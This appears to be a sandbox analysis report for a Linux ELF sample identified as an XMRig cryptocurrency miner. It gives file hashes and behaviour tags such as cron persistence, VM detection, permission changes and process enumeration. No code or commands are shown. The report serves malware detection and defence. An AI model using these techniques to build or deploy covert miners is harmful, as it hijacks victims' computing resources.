General

  • Target

    5531f59f87bca7e0c35846051362d51de071afb8533a55a248b0af4650465a5f.elf

  • Size

    918KB

  • Sample

    241117-ptre8syrgt

  • MD5

    70a741de589e0538307850cf036bde70

  • SHA1

    a35398ef7cf835937c30f1c60d3db82f035dcb47

  • SHA256

    5531f59f87bca7e0c35846051362d51de071afb8533a55a248b0af4650465a5f

  • SHA512

    f4f3747b49792e217056c19d1d5add4d4b1c6aa37ef2aa7c8914d0f9f3bfcb0db22444b9879b32f4d2706537bef26577d566e8c1ad1768cc0fd5834c70d0d5b4

  • SSDEEP

    12288:zRwB0BGilgQ0UrlPkui3hp4CUSpLPo7EuozpyyUbRkoXd:zRwB0jgQ0UrFkuiRp45+LPoL1k6

Malware Config

Targets

    • Target

      5531f59f87bca7e0c35846051362d51de071afb8533a55a248b0af4650465a5f.elf

    • Size

      918KB

    • MD5

      70a741de589e0538307850cf036bde70

    • SHA1

      a35398ef7cf835937c30f1c60d3db82f035dcb47

    • SHA256

      5531f59f87bca7e0c35846051362d51de071afb8533a55a248b0af4650465a5f

    • SHA512

      f4f3747b49792e217056c19d1d5add4d4b1c6aa37ef2aa7c8914d0f9f3bfcb0db22444b9879b32f4d2706537bef26577d566e8c1ad1768cc0fd5834c70d0d5b4

    • SSDEEP

      12288:zRwB0BGilgQ0UrlPkui3hp4CUSpLPo7EuozpyyUbRkoXd:zRwB0jgQ0UrFkuiRp45+LPoL1k6

    • XMRig Miner payload

    • Xmrig family

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • File and Directory Permissions Modification

      Adversaries may modify file or directory permissions to evade defenses.

    • Executes dropped EXE

    • Checks hardware identifiers (DMI)

      Checks DMI information which indicate if the system is a virtual machine.

    • Creates/modifies Cron job

      Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    • Enumerates running processes

      Discovers information about currently running processes on the system

    • Reads hardware information

      Accesses system info like serial numbers, manufacturer names etc.

MITRE ATT&CK Enterprise v15

Tasks